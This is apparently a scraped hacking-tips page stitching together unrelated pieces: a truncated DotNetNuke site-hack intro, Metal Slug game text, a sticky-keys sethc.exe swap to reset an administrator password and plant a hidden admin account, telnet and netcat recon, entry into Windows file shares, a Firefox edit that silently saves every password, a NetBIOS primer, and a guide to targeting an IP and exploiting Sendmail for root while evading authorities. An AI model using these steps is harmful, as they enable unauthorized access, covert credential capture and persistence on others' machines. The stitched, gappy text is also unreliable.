Today I will explain a new hacking technique known as DNN (DotNetNuke). I will show you how to hack a DNN website. Is it easy? Yes. It is easy compared to other hacking attacks such as SQL-Injection and Cross Site Scripting. I will teach you how to find your target and how to enter into the target website and upload your files.
DotNetNuke is an open source platform for building web sites based on Microsoft .NET technology. DotNetNuke is mainly provide Content Management System(CMS) for the personal websites.
Below are the easy steps to implement the attack:

First use a google dork to find the appropriate target.

Now search your website on the google after searching you will get many websites choose any one of it.

Its time to check the required vulnerability on the website just place this code after the web address.

Metal Slug is a series of run and gun video games first released on Neo-Geo arcade machines and game consoles created by SNK. It was also ported to other consoles, such as the Sega Saturn, the PlayStation, the Neo-Geo Pocket Color and more recently, the Game Boy Advance, PlayStation 2, Xbox, Xbox 360 and Nintendo DS. There is also an anthology of the first 7 games in the main series (including Metal Slug X) available for the Wii, PlayStation Portable, and PlayStation 2.

The gameplay of the series is characteristic of run and guns: The enemies come in hordes, the weapons have high fire rates. All of these characteristics come from the Contra series, which the gameplay is based on. Metal Slug however takes the concepts introduced in Contra and expands upon them. First and foremost is the ability to perform melee attacks. In most run and guns, contact with an enemy leads to immediate death. In this series, however, contact only results in either party’s death if an attack is performed. This leads to the ability for the player to run in and use melee attacks to take down a number of troops.
Characters

Marco Rossi and Tarma Roving were the first playable characters, but each was reserved solely to the first and second player, respectively. In the second installment, Eri Kasamoto and Fiolina “Fio” Germi were added to the cast. These four are considered by fans to be the quintessential Metal Slug team. In the fourth game, Nadia Cassel and Trevor Spacey made their debut, replacing Eri and Tarma, respectively, but have not returned for later games. Eri and Tarma returned in the fifth game. The Game Boy Advance edition of the game features two new characters specific to that title: PF squad trainees Walter Ryan and Tyra Elson. King of Fighters/Ikari Warriors characters Ralf Jones and Clark Still appear in Metal Slug 6, released for the Atomiswave hardware in February 2006. Keys: Now this is weird thing in this game. I had a very hard time to configure the right keys for this one. This was all messed up in keys configuration settings. You can try it by yourself. Here for your help let me try to explain. Go to game -> Redefine keys and configure keys by yourself. Default key for coin is / (at numpad) and for starting one player is * (at numpad). You can change these to F3 and F1. For left, right, up, down moves there are a, d, w keys. You can select those and enter arrow keys on keyboard to set these as arrow keys. Don’t know if I am confusing you. Let me break it down. Set F3 and F1 for coin and start and arrow keys for moves. Then just keep hitting the a, s, d, f, z, x, c, v as the control moves in the ‘keys configuration panel’, till all keys be set. I am showing you here my screenshot for keys.

Concept

Press shift key 5 times and the sticky key dialog shows up.This works even at the logon screen. But If we replace the sethc.exe which is responsible for the sticky key dialog,with cmd.exe, and then call sethc.exe by pressing shift key 5 times at logon screen,we will get a command prompt with administrator privileges because no user has logged on. From there we can hack the administrator password,even from a guest account.

Prerequisites

Guest account with write access to system 32.

Method 1 (Change Admin Password)

Here is how to do that -

1.Go to C:/windows/system32
2.Copy cmd.exe and paste it on desktop
3.Rename cmd.exe to sethc.exe
4.Copy the new sethc.exe to system 32,when windows asks for overwriting the file,then click yes.

5.Now Log out from your guest account and at the user select window,press shift key 5 times.
6. Instead of Sticky Key confirmation dialog,command prompt with full administrator privileges will open.

7.Now type “ NET USER ADMINISTRATOR aaa” where “aaa” can be any password you like and press enter.

8.You will see “ The Command completed successfully” and then exit the command prompt and login into administrator with your new password.

9.Congrats You have hacked admin from guest account.

Method 2 (Access admin without changing password)

Also, you can further create a new user at the command prompt by typing “NET USER haryanwi/ADD” where “haryanwi” is the username you would like to add with administrator privileges. Then hide your newly created admin account by -

Go to registry editor and navigate to this key

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]

Here create a new “DWORD value”, write its name as the “haryanwi” (the username that you entered in the previous step),now you can live with your admin account forever

How to Use Telnet on a Windows Computer

Telnet is great little program for doing a couple of interesting things. In fact, if you want to call yourself a hacker, you absolutely MUST be able to telnet! In this lesson you will find out a few of the cool things a hacker can do with telnet.
If you are using Win95, you can find telnet in the c:\windows directory, and on NT, in the c:\winnt\system32 directory. There isn't a lot of online help concerning the usage of the program, so my goal is to provide some information for new users.
First off, telnet isn't so much an application as it is a protocol. Telnet is protocol that runs over TCP/IP, and was used for connecting to remote computers. It provides a login interface, and you can run command-line programs by typing the commands on your keyboard, and the programs use the resources of the remote machine. The results are displayed in the terminal window on your machine, but the memory and CPU cycles consumed by the program are located on the remote machine. Therefore, telnet functions as a terminal emulation program, emulating a terminal on the remote machine.
Now, telnet runs on your Win95 box as a GUI application...that is to say that you can type "telnet" at the command prompt (in Windows 95 this is the MS-DOS prompt), and assuming that your PATH is set correctly, a window titled "telnet" will open. This differs from your ftp program in that all commands are entered in the DOS window.
Let's begin by opening telnet. Simply open a DOS window by clicking "start", then "programs", then "MS-DOS", and at the command prompt, type:
c:\telnet
The window for telnet will open, and you can browse the features of the program from the menu bar.

you can connect to:
daytime: May give you the current time on the server.
echo: May echo back whatever you type in, and will tell you that the computer you have connected to is alive nd running on the Internet. qotd: May provide you with a quote of the day.
chargen: May display a continuous stream of characters, useful for spotting network problems, but may crash your telnet program.
telnet: May present you with a login screen.
These will only work if the server to which you are trying to connect is running these services. However, you are not limited to just those ports...you can type in any port number you wish. (For more on fun ports, see the GTMHH, "Port Surf's Up.") You will only successfully connect to the port if the service in question is available. What occurs after you connect depends upon the protocol for that particular service.
When you are using telnet to connect to the telnet service on a server, you will (in most cases) be presented with a banner and a login prompt.
[Note from Carolyn Meinel: Many people have written saying their telnet program fails to connect no matter what host they try to reach. Here's a way to fix your problem. First -- make sure you are already connected to the Internet. If your telnet program still cannot connect to anything, here's how to fix your problem. Click "start" then "settings" then "control panel." Then click "Internet" then "connection." This screen will have two boxes that may or may not be checked. The top one says "connect to the Internet as needed." If that box is checked, uncheck it -- but only uncheck it if you already have been having problems connecting. The bottom box says "connect through a proxy server." If that box is checked, you probably are on a local area network and your systems administrator doesn't allow you to use telnet.]

NEWBIE NOTE: It's not a good idea to connect to a host on which you don't have a valid account. In your attempts to guess a username and password, all you will do is fill the log files on that host. From there, you can very easily be traced, and your online service provider will probably cancel your account.

Now, you can also use telnet to connect to other ports, such as
ftp (21), smtp (25), pop3 (110), and even http (80). When you
connect to ftp, smtp, and pop3, you will be presented with a
banner, or a line of text that displays some information about the
service. This will give you a clue as to the operating system
running on the host computer, or it may come right out and tell
you what the operating system is...for instance, AIX, Linux,
Solaris, or NT. If you successfully connect to port 80, you will
see a blank screen. This indicates, again, that you have successfully completed the TCP negotiation and you have a connection.
Now, what you do from there is up to you. You can simply disconnect with the knowledge that, yes, there is a service running on port 80, or you can use your knowledge of the HTTP protocol to retrieve the HTML source for web pages on the server.
How to Download Web Pages Via Telnet
To retrieve a web page for a server using telnet, you need to connect to that server on port 80, generally. Some servers may use a different port number, such as 8080, but most web servers run on port 80. The first thing you need to do is click on Terminal -> Preferences and make sure that there is a check in the Local Echo box. Then, since most web pages will generally take up more than a single screen, enable logging by clicking Terminal -> Start Logging... and select a location and filename. Keep in mind that as long as logging is on, and the same file is being logged to, all new information will be appended to the file, rather than overwriting the
original file. This is useful if you want to record several sessions, and edit out the extraneous information using Notepad.
Now, connect the remote host, and if your connection is successful, type in:
GET / HTTP/1.0
and hit enter twice.

name. This refers to the web server software that is running
and serving web pages. You may see other names in this field,
such as versions of Microsoft IIS, Purveyor, WebSite, etc.
This will give you a clue as to the underlying operating system
running on the server.

Getting Finger Information Via Telnet
By now, you've probably heard or read a lot about finger. It doesn't seem like a very useful service, and many sysadmins disable the service because it provides information on a particular user, information an evil hacker can take advantage of. Win95 doesn't ship with a finger client, but NT does. You can download finger clients for Win95 from any number of software sites. But why do that when you have a readily available client in telnet?
The finger daemon or server runs on port 79, so connect to a remote host on that port. If the service is running, you will be presented with a blank screen.

NEWBIE NOTE: NT doesn't ship with a finger daemon (A daemon is a program on the remote computer which waits for people like you to connect to it), so generally speaking, and server that you find running finger will be a Unix box. I say "generally" because there are third-party finger daemons available and someone may want to run one on their NT computer.

The blank screen indicates that the finger daemon is waiting for input. If you have a particular user that you are interested in, type in the username and hit enter. A response will be provided, and the daemon will disconnect the client. If you don't know a particular username, you can start by simply hitting enter. In some cases, you may get a response such as "No one logged on." Or you may get information of all currently logged on users. It all depends on whether or not the sysadmin has chosen to enable certain features of the daemon. You can also try other names, such as "root", "daemon", "ftp", "bin", etc.
Another neat trick to try out is something that I have seen referred to as "finger forwarding". To try this out, you need two hosts that run finger. Connect to the first host, host1.com, and enter the username that you are interested in. Then go to the second host, and enter:
user@host1.com
You should see the same information! Again, this all depends upon
the configuration of the finger daemon.
Using Telnet from the Command Line
Now, if you want to show your friends that you a "real man" because "real men don't need no stinkin' GUIs", well just open up a DOS window and type:
c:\>telnet
and the program will automatically attempt to connect to the host
on the designated port for you.
Using Netcat
Let me start by giving a mighty big thanks to Weld Pond from L0pht for producing the netcat program for Windows NT. To get a copy of this program, which comes with source code, simply go to:

NOTE: The first character of "l0pht: is the letter "l". The second character is a zero, not an "o".
I know that the program is supposed to run on NT, but I have
seen it run on Win95. It's a great little program that can be used
to do some of the same things as telnet. However, there are
advantages to using netcat...for one, it's a command-line program,
and it can be included in a batch file. In fact, you can automate
multiple calls to netcat in a batch file, saving the results to
a text file.

Before using netcat, take a look at the readme.txt file provided in
the zipped archive you downloaded. It goes over the instructions
on how to download web pages using netcat, similar to what I
described earlier using telnet.
There are two ways to go about getting finger information using
netcat. The first is in interactive mode. Simply type:
c:\>nc 79
If the daemon is running, you won't get a command prompt back. If this is the case, type in the username and hit enter. Or use the automatic mode by first creating a text file containing the username of interest. For example, I typed:
c:\>edit root
and entered the username "root", without the quotes. Then from
the command prompt, type:
c:\>nc 79 <>
and the response will appear on your screen. You can save the
output to a file by adding the appropriate redirection operator
to the end of the file:
c:\>nc 79 <> nc.log
to create the file nc.log, or:
c:\>nc 79 <>> nc.log
to append the response to the end of nc.log. NOTE: Make sure
that you use spaces between the redirection operators.

How to Break into a Windows machine Connected to the Internet

Disclaimer
The intent of this file is NOT to provide a step-by-step guide to accessing a Win95 computer while it is connected to the Internet. The intent is show you how to protect yourself.

There are no special tools needed to access a remote Win machine...everything you need is right there on your Win system! Two methods will be described...the command-line approach and the GUI approach.

Protecting Yourself

First, the method of protecting yourself needs to be made perfectly clear. DON'T SHARE FILES!! I can't stress that enough. If you are a home user, and you are connecting a Win computer to the Internet via some dial-up method, disable sharing. If you must share, use a strong password...8 characters minimum, a mix of upper and lower case letters and numbers, change the password every now and again. If you need to transmit the
password to someone, do so over the phone or by written letter. To disable sharing, click on My Computer -> Control Panel -> Network -> File and Print Sharing. In the dialog box that appears, uncheck both boxes. It's that easy.

What Can They Do?

What can someone do? Well, lots of stuff, but it largely depends on what shares are available. If someone is able to share a printer from your machine, they can send you annoying letters and messages. This consumes time, your printer ink/toner, and your paper. If they are able to share a disk share, what they can do largely depends upon what's in that share. The share appears as another directory on the attacker's machine, so any programs they run will be consuming their own resources...memory, cpu cycles, etc. But if the attacker has read and write access to those disk shares, then you're in trouble. If you take work home, your files may be vulnerable. Initialization and configuration files can be searched for passwords. Files can be modified and deleted. A particularly nasty thing to do is adding a line to your autoexec.bat file so that the next time your computer is booted, the hard drive is formatted without any prompting from the user. Bad ju-ju, indeed.

** The command-line approach **

Okay, now for the part that should probably be titled "How they do it". All that is needed is the IP address of the remote machine. Now open up a DOS window, and at the command prompt, type:
c:\>nbtstat -A [ip_addr]
If the remote machine is connected to the Internet and the ports used for sharing are not blocked, you should see something like:

This machine name table shows the machine and domain names, a logged-on username, and the address of the Ethernet adapter (the information has been obfuscated for instructional purposes).
**Note: This machine, if unpatched and not protected with a firewall or packet-filter router, may be vulnerable to a range of denial of service attacks, which seem to be fairly popular, largely because they require no skill or knowledge to perpetrate.
The key piece of information that you are looking for is in the Type column. A machine that has sharing enabled will have a hex code of "<20>".
**Note: With the right tools, it is fairly simple for a sysadmin to write a batch file that combs a subnet or her entire network, looking for client machines with sharing enabled. This batch file can then be run at specific times...every day at 2:00 am, only on Friday evenings or weekends, etc.
If you find a machine with sharing enabled, the next thing to do is type the following command:
c:\>net view \\[ip_addr]
Now, your response may be varied. You may find that there are no shares on the list, or that there are several shares available. Choose which share you would like to connect to, and type the command:
c:\>net use g: \\[ip_addr]\[share_name]
You will likely get a response that the command was completed successfully. If that is the case, type:
c:\>cd g:
or which ever device name you decided to use. You can now view what exists on that share using the dir commands, etc.
Now, you may be presented with a password prompt when you ssue the above command. If that is the case, typical "hacker" (I shudder at that term) methods may be used.
** The GUI approach **
After issuing the nbtstat command, you can opt for the GUI approach to accessing the shares on that machine. To do so, make sure that you leave the DOS window open, or minimized...don't close it. Now, use Notepad to open this file:
c:\windows\lmhosts.sam
Read over the file, and then open create another file in Notepad, called simply "Lmhosts", without an extension. The file should contain the IP address of the host, the NetBIOS name of the host (from the nbtstat command), and #PRE, separated by tabs. Once you have added this information, save it, and minimize the window. In the DOS command window, type:
c:\>nbtstat -R
This command reloads the cache from the Lmhosts file you just created.
Now, click on Start -> Find -> Computer, and type in the NetBIOS name of the computer...the same one you added to the lmhosts file. If your attempt to connect to the machine is successful, you should be presented with a window containing the available shares. You may be presented with a password prompt window, but again, typical "hacker" (again, that term grates on me like fingernails on a chalk board, but today, it seems that it's all folks understand) techniques may be used to break the password.

Want to try this stuff without winding up in jail or getting expelled from school? Get a friend to give you permission to try to break in.
First, you will need his or her IP address. Usually this will be different every time your friend logs on. You friend can learn his or her IP address by going to the DOS prompt while online and giving the command "netstat -r". Something like this should show up:

Your friend's IP address should be under "Gateway Address." Ignore the 127.0.0.1 as this will show up for everyone and simply means "locahost" or "my own computer." If in doubt, break the Internet connection and then get online again. The number that changes is the IP address of your friend's computer.

tip: Here is something really scary. In your shell account give the "netstat" command. If your ISP allows you to use it, you might be able to get the dynamically assigned IP addresses of people from all over the world -- everyone who is browsing a Web site hosted by your ISP, everyone using ftp, spammers you might catch red-handed in the act of forging email on your ISP, guys up at 2AM playing on multiuser dungeons, IRC users, in fact you will see everyone who is connected to your ISP!

YOU CAN GO TO JAIL WARNING: If you find a Windows xp box on the Internet with file sharing enabled and no password protection, you can still get in big trouble for exploiting it. It's just like finding a house whose owner forgot to lock the door -- you still are in trouble if someone catches you inside. Tell temptation to take a hike!

Enable Disabled Buttons in Windows with Enabler

There are times when Windows or a software doesn’t allow us to click a button. It could be a shareware that only after registering the button would be enabled or a feature that doesn’t make any sense if it was enabled. For example, if you run Windows Task Manager, go to the Users tab and click on the user that you are currently logged on as, the Send Message button is disabled. This sending message feature is useful if there are a few users logged on and you can send a message to another user but there is no logic in sending the message to yourself. That explains why the Send Message is disabled for currently logged on user. Jack ONeill, the owner of EvilFingers has created a simple free tool called Enabler that can enable any disabled or grayed out buttons in Windows. There is no requirement or need for privilege escalation because this will enable any button on the user’s windows and there is no requirement to be a root or super user for enabling the buttons.

Here is a simple proof of concept on how Enabler works. Right click on Windows Taskbar and select Task Manager. Click on the Users tab and then select the current logged on user. The disconnect and Logoff button is enabled but the Send Message button is not accessible. Keep Windows Task Manager open and do not close it.

It is important to make sure that the user is in focus/selected after enabling the button. Once you click on other areas and then you go back to the user again, the button will be disabled and you have to use Enabler to bring it back.

Macrium Reflect is a great software to create a full backup of your hard drive or partition so that you can restore it back exactly the way it was when you created the backup. I have the full version of Macrium Reflect installed on my Acer laptop running Windows 7 and I find it very useful whenever I want to install and test any software because I can first create a full backup and then if anything goes wrong, I can simply restore it back. FYI, I never used System Restore and that’s the first thing I disable after installing Windows Don’t ask why, I just prefer to put my trust in disk imaging rather than Windows System Restore. Recently I got to know another disk cloning software which is FREE from EASEUS called Todo Backup.

I’d say that the bootable disc is a must to create because most of the time you’ll only need to restore your computer is when you cannot boot up Windows. To create bootable media, run Todo Backup 1.0 Media Builder wizard by selecting “Tools” and “Create Bootable CD”. You can also run Bootable Media Builder without loading Todo Backup 1.0 by selecting “Programs”-> “EASEUS Todo Backup 1″-> “Bootable Media Builder” from the Start menu. You can also directly burn a bootable disc from the ISO image file located in C:\Program Files\EASEUS\EASEUS Todo Backup 1.0\bin\image.iso. When you boot up the computer with the boot CD, you should see a screen like the image below.

Just like Macrium Reflect, Todo Backup 1.0 bootable CD can ONLY restore and does not create backups. The backup can only be done in Windows…
I tried creating an image on my desktop running Windows XP Professional SP3 that’s taking up only 2.55GB of space. I saved the image to my second hard drive. The backup with no compression took 1 minute, 10 seconds to complete and image file size is also 2.55GB since the compression is disabled. Then I tried the normal compression, it took 3 minutes, 43 seconds to complete and compressed the file size to 1.28GB. As for restoration, the not compressed image took 4 minutes and as for the normal compression image took 4 minutes, 25 seconds. Looks like the compression only speeds up the backup process and not much on the restore.

Todo Backup v1.0 supports Windows 2000 (SP4), XP (32 and 64 bit), Vista (32 and 64 bit), Server 2003 (32 and 64 bit), and Server 2008 (32 and 64 bit). Verified not working on Windows 7 because I tried creating a backup and my computer crashed.

Fortunately resetting the Wordpress administrator password is very easy through phpMyAdmin. phpMyAdmin is a free software tool written in PHP intended to handle the administration of MySQL using your web browser. If you don’t have one, I’d suggest you to ask your server administrator to install one.

Once you’re logged in to phpMyAdmin, you need to make sure you’re editing the Wordpress database that you’re supposed to. The list of database should appear on the left pane. Click on it to select the database.

Once you’ve done that, click on wp_users on the left pane which should list all users for the Wordpress site. Hacking Firefox to Always Auto Save Password Without Notification Bar

As usual when I was screening through all the new posts in forum to see if there are any spam and also any computer topic that I can help, I saw an interest question asked by Rizzano. He wanted to know if there is anyway to make Firefox auto save password without clicking the Remember button. In Firefox, even if you have the option “Security Remember passwords for sites” checked in Tools > Options,the browser will still display a notification bar at the top that asks “Do you want Firefox to remember the password for “Username” on website.com?” with three buttons “Remember”, “Never for This Site” and “Not Now”.

The first thing that came to my mind was perhaps there is an addon that can do this but I couldn’t find any that can make Firefox auto save password without prompting. After spending nearly two hours researching on how Firefox saves the password, I managed to find a way on how to make Firefox save the login information to the Firefox Saved Passwords manager.
First, I searched some of the important keywords such as “Never for This Site” and “Not Now” on all the files and found that this function is controlled by a few javascript .js files. Then I was more confident in getting this to work since I didn’t have to go through the trouble of downloading the Firefox source code, modify and compile it.

When you submit a form with username and password, it will process the function:
1. _onFormSubmit() in nsLoginManager.js
2. promptToSavePassword in nsLoginManagerPrompter.js
3. _showSaveLoginNotification in nsLoginManagerPrompter.js
4. addLogin in nsLoginManager.js

1. Close Firefox
2. Edit nsLoginManagerPrompter.js with notepad which is normally located in C:\Program Files\Mozilla Firefox\components\
3. Replace the entire line 642 to 711 with the code below:

pwmgr.addLogin(aLogin);

Now whenever you login to any website, Firefox will auto save the site, username and password to the login manager WITHOUT showing the notification bar. You can access the saved password area by going to Tools > Options > Security and click the Saved Passwords button. There is one possible bug which is even when a user entered the wrong username or password, it will still be saved.
I am calling this a hack instead of customization because it’s not an included feature in Firefox. I had to manually modify one of it’s original core files to make this work. Thinking about this logically, obviously Firefox did not include such feature nor there is an addon for this because they don’t want the world’s favorite browser to turn into a keylogger. Use it with care and think twice before implementing this illegally as it can get you into a lot of trouble!

When you look at ur collection of old cd’s you fint that almost all of them have some scratches all over it and most of them have become unreadable.

Useful Tips

Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but – it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like “Why did you start your NetBIOS section off so basic?” – Simple, its written for people that may be coming from an environment that does not use NetBIOS, so they would need me to start with basics, thanks.

Whats is NetBIOS?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.

NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM’s Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.

It offers network applications a set of “hooks” to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.

NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.

PC’s on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.

All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB’s are divided into fields, these are reserved for input and output respectively.

NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.

In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.

NetBIOS Names

NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.

NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.

When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:

1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.

2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.

3. If no other client on the network objects to the name registration, the client will finish the registration process.

There are two types of names in a NetBIOS environment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.

The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to identify the functionality installed or the registered device or service.

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0

For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:

NetBIOS Sessions

The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams

Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.

The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.

NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.

Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.

NetBEUI Explained

NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.

NetBIOS Scopes

A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.

How To Hack With A IP Address

So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I’m not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to “hack” the box. Port Scanners are used to identify the open ports on a machine that’s running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner – This program will scan the IP address that you chose and identify open ports that are on the target box.

In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc…) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we don’t even know what type of software or what operating system that this system is running.

2) NMAP – Port Scanner – Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgment to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you haven’t even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed ‘TELNET -o xxx.xxx.xxx.xxx 25′ This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information you’ve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.

Now this is a very important part in the enumeration process. You notice it says ‘Sendmail 8.12.8/8.12.8′ Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peace of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window that’s currently open was opened as root. The highest privilege on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I don’t recommend that. Maybe leave a text file saying how you did it and that they should patch their system…..whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

